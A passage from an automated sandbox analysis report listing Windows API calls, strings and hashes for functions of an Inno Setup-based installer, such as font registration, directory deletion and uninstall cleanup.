                                                                                                                                                                        • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                                                                                                                        • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495A91
                                                                                                                                                                      • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495AA5
                                                                                                                                                                      • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495ABF
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495ACB
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AD1
                                                                                                                                                                      • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AE4
                                                                                                                                                                      Strings
                                                                                                                                                                      • Deleting Uninstall data files., xrefs: 00495A07
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                                                                                      • String ID: Deleting Uninstall data files.
                                                                                                                                                                      • API String ID: 1570157960-2568741658
                                                                                                                                                                      • Opcode ID: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                                                                                                                                      • Instruction ID: 8fd25edfc014547dd13852670f785c7791f766ba0082412c3ee421c8584d85d8
                                                                                                                                                                      • Opcode Fuzzy Hash: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D217371304610AFEB11E7A6ECC6B2736A8E758328F61453BB5019A1E2D67CAC04CB6C
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0047001C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119,?,?,?,?,00000000), ref: 00470083
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119), ref: 0047009A
                                                                                                                                                                      • AddFontResourceA.GDI32(00000000), ref: 004700B7
                                                                                                                                                                      • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004700CB
                                                                                                                                                                      Strings
                                                                                                                                                                      • AddFontResource, xrefs: 004700D5
                                                                                                                                                                      • Failed to open Fonts registry key., xrefs: 004700A1
                                                                                                                                                                      • Failed to set value in Fonts registry key., xrefs: 0047008C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                                                                                      • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                                                                                      • API String ID: 955540645-649663873
                                                                                                                                                                      • Opcode ID: 3a2357c81f17267fe4acf1b3c208f10f48507ee00f68126fffaa9095dad12e6d
                                                                                                                                                                      • Instruction ID: 9e1cacd5bb0885738b58fd2773111f6953d7784f445270ce1bd520dac8ad2ca8
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a2357c81f17267fe4acf1b3c208f10f48507ee00f68126fffaa9095dad12e6d
                                                                                                                                                                      • Instruction Fuzzy Hash: 2921B270741240BBDB10EA669C42FAA77DDCB54708F508437B904EB3C2DA7DAE02966D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00462C58 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00416408: GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                                                                                                                                        • Part of subcall function 00416408: UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                                                                                                                                        • Part of subcall function 00416408: RegisterClassA.USER32(?), ref: 004164C6
                                                                                                                                                                      • GetVersion.KERNEL32 ref: 00462C88
                                                                                                                                                                      • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462CC6
                                                                                                                                                                      • SHGetFileInfo.SHELL32(00462D64,00000000,?,00000160,00004011), ref: 00462CE3
                                                                                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 00462D01
                                                                                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D07
                                                                                                                                                                      • SetCursor.USER32(?,00462D47,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D3A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                                                                                      • String ID: Explorer
                                                                                                                                                                      • API String ID: 2594429197-512347832
                                                                                                                                                                      • Opcode ID: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                                                                                                                                      • Instruction ID: fc1c968538dd14d686f90bdc81855b9701391525be241791f09fb78c6da7bbf1
                                                                                                                                                                      • Opcode Fuzzy Hash: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                                                                                                                                      • Instruction Fuzzy Hash: 7A21E7717407047AE720BB768D47F9A3698DB09708F40047FBA09EF2D3D9BC880186AD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00459C2C Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00459DAE,?,00000000,00000000,00000000,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 00459CF2
                                                                                                                                                                        • Part of subcall function 004543C8: FindClose.KERNEL32(000000FF,004544BE), ref: 004544AD
                                                                                                                                                                      Strings
                                                                                                                                                                      • Failed to strip read-only attribute., xrefs: 00459CC0
                                                                                                                                                                      • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459CCC
                                                                                                                                                                      • Deleting directory: %s, xrefs: 00459C7B
                                                                                                                                                                      • Stripped read-only attribute., xrefs: 00459CB4
                                                                                                                                                                      • Failed to delete directory (%d). Will retry later., xrefs: 00459D0B
                                                                                                                                                                      • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459D67
                                                                                                                                                                      • Failed to delete directory (%d)., xrefs: 00459D88
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseErrorFindLast
                                                                                                                                                                      • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                                                                                                      • API String ID: 754982922-1448842058
                                                                                                                                                                      • Opcode ID: 555b7f613928bde620302c0bc0a12c097f137ed2da810282f3c28cf8f506aac5
                                                                                                                                                                      • Instruction ID: cce1cab1201e8728e9bc38508445727295e1911ffe2e7292dd45cd7f335e186b
                                                                                                                                                                      • Opcode Fuzzy Hash: 555b7f613928bde620302c0bc0a12c097f137ed2da810282f3c28cf8f506aac5
                                                                                                                                                                      • Instruction Fuzzy Hash: F9418230A04259DACB04EB6988013AE76F55F4930AF55857FAC0597393D7BC8E0D879A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00422E48 Relevance: 12.1, APIs: 8, Instructions: 119windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCapture.USER32 ref: 00422E9C
                                                                                                                                                                      • GetCapture.USER32 ref: 00422EAB
                                                                                                                                                                      • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB1
                                                                                                                                                                      • ReleaseCapture.USER32 ref: 00422EB6
                                                                                                                                                                      • GetActiveWindow.USER32 ref: 00422EC5
                                                                                                                                                                      • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F44
                                                                                                                                                                      • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FA8
                                                                                                                                                                      • GetActiveWindow.USER32 ref: 00422FB7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 862346643-0
                                                                                                                                                                      • Opcode ID: 2b91be5eb3590adda7edaa7e113baa4d522d785d7c966572815399c821e1d938
                                                                                                                                                                      • Instruction ID: a831bf89ec3617aa4b81e8a61b28cb02c358a8e939ae68eb352e359643dafe13
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b91be5eb3590adda7edaa7e113baa4d522d785d7c966572815399c821e1d938
                                                                                                                                                                      • Instruction Fuzzy Hash: E1414070B00245AFDB10EF69DA46B9E77F1EF48304F5140BAF404AB2A2D7B89E40DB59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042F288 Relevance: 12.1, APIs: 8, Instructions: 102windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 0042F2B2
                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0042F2C9
                                                                                                                                                                      • GetActiveWindow.USER32 ref: 0042F2D2
                                                                                                                                                                      • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F2FF
                                                                                                                                                                      • SetActiveWindow.USER32(?,0042F42F,00000000,?), ref: 0042F320
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ActiveLong$Message
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2785966331-0
                                                                                                                                                                      • Opcode ID: 3a7460e7009fb0b2937d8efb91ec535960ff4edc13e1a8ddbe326696a1612495
                                                                                                                                                                      • Instruction ID: 9696dc9395d24dec9abacdc10881687288e082ae8fcf9a6a48756090996bfad8
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a7460e7009fb0b2937d8efb91ec535960ff4edc13e1a8ddbe326696a1612495
                                                                                                                                                                      • Instruction Fuzzy Hash: A431A171A00714AFDB01EFB9DC52E6E7BF8EB09714B9148BAF804E7291D7389D10CA58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00429478 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • 7406A670.USER32(00000000), ref: 00429482
                                                                                                                                                                      • GetTextMetricsA.GDI32(00000000), ref: 0042948B
                                                                                                                                                                        • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0042949A
                                                                                                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 004294A7
                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 004294AE
                                                                                                                                                                      • 7406A580.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294B6
                                                                                                                                                                      • GetSystemMetrics.USER32(00000006), ref: 004294DB
                                                                                                                                                                      • GetSystemMetrics.USER32(00000006), ref: 004294F5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Metrics$7406ObjectSelectSystemText$A580A670CreateFontIndirect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4086688125-0
                                                                                                                                                                      • Opcode ID: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                                                                                                                                      • Instruction ID: 79023d5d76270fc5b80a90959683f08304bbfc9b3a68a0d1de019d9dda53e89a
                                                                                                                                                                      • Opcode Fuzzy Hash: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                                                                                                                                      • Instruction Fuzzy Hash: FE01C0A17087503BE311767A9CC6F6F65C8DB44358F84043BF686D63D3D9AC9C81876A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041DE1C Relevance: 12.1, APIs: 8, Instructions: 60windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • 7406A670.USER32(00000000,?,00419051,004980EA), ref: 0041DE1F
                                                                                                                                                                      • 74074720.GDI32(00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE29
                                                                                                                                                                      • 7406A580.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE36
                                                                                                                                                                      • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE45
                                                                                                                                                                      • GetStockObject.GDI32(00000007), ref: 0041DE53
                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 0041DE5F
                                                                                                                                                                      • GetStockObject.GDI32(0000000D), ref: 0041DE6B
                                                                                                                                                                      • LoadIconA.USER32(00000000,00007F00), ref: 0041DE7C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ObjectStock$7406$74074720A580A670IconLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3191187925-0
                                                                                                                                                                      • Opcode ID: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                                                                                                                                      • Instruction ID: 462cd7651d9f59a3c1518f9422d26db27efab3bc10fcb75ee14264e6343fb545
                                                                                                                                                                      • Opcode Fuzzy Hash: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E11EC706456055AE340FFAA6A52BAA3695E724708F00813FF6099F3D1D77D2C444B9F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00463068 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 273COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0046316C
                                                                                                                                                                      • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463201), ref: 00463172
                                                                                                                                                                      • SetCursor.USER32(?,004631E9,00007F02,00000000,00463201), ref: 004631DC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cursor$Load
                                                                                                                                                                      • String ID: $ $Internal error: Item already expanding
                                                                                                                                                                      • API String ID: 1675784387-1948079669
                                                                                                                                                                      • Opcode ID: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                                                                                                                                      • Instruction ID: 8c03ff8e54c482a295deb11cd31210a84b03b27930917a3eb50de1af6f5dfb0a
                                                                                                                                                                      • Opcode Fuzzy Hash: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                                                                                                                                      • Instruction Fuzzy Hash: A7B1C430A00284DFD711DF69C589B9ABBF1FF04305F1484AAE8459B792EB78EE45CB19
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00453D04 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 225COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                                                                                      • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                                                                                                      • API String ID: 390214022-3304407042
                                                                                                                                                                      • Opcode ID: f771c3257bc7242db11940ec8dd5616f190bceec795dfe35458cf45b7ea6b09f
                                                                                                                                                                      • Instruction ID: 27719b604a15c88968755e1a1929315a4e70c7568c957628d41e5ea0e69e6a26
                                                                                                                                                                      • Opcode Fuzzy Hash: f771c3257bc7242db11940ec8dd5616f190bceec795dfe35458cf45b7ea6b09f
                                                                                                                                                                      • Instruction Fuzzy Hash: DD914434E001099BDF11EFA5D882BDEB7F5EF4834AF508066E90077292D778AE49CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004766E4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 200windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 0047673D
                                                                                                                                                                      • 74075AE0.USER32(00000000,000000FC,00476698,00000000,0047697C,?,00000000,004769A6), ref: 00476764
                                                                                                                                                                      • GetACP.KERNEL32(00000000,0047697C,?,00000000,004769A6), ref: 004767A1
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004767E7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 74075ClassInfoMessageSend
                                                                                                                                                                      • String ID: COMBOBOX$Inno Setup: Language
                                                                                                                                                                      • API String ID: 1747102527-4234151509
                                                                                                                                                                      • Opcode ID: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                                                                                                                                      • Instruction ID: 91173772f4e079f50c7e0c6215708d31291a540b6063389a75a2ac3d3f1b2ee4
                                                                                                                                                                      • Opcode Fuzzy Hash: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                                                                                                                                      • Instruction Fuzzy Hash: 68814074A006059FCB10EF69C985AEAB7F5FB09304F56C0BAE808E7362D734AD45CB59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00408710 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLCID.KERNEL32(00000000,00408958,?,?,?,?,00000000,00000000,00000000,?,0040995F,00000000,00409972), ref: 0040872A
                                                                                                                                                                        • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
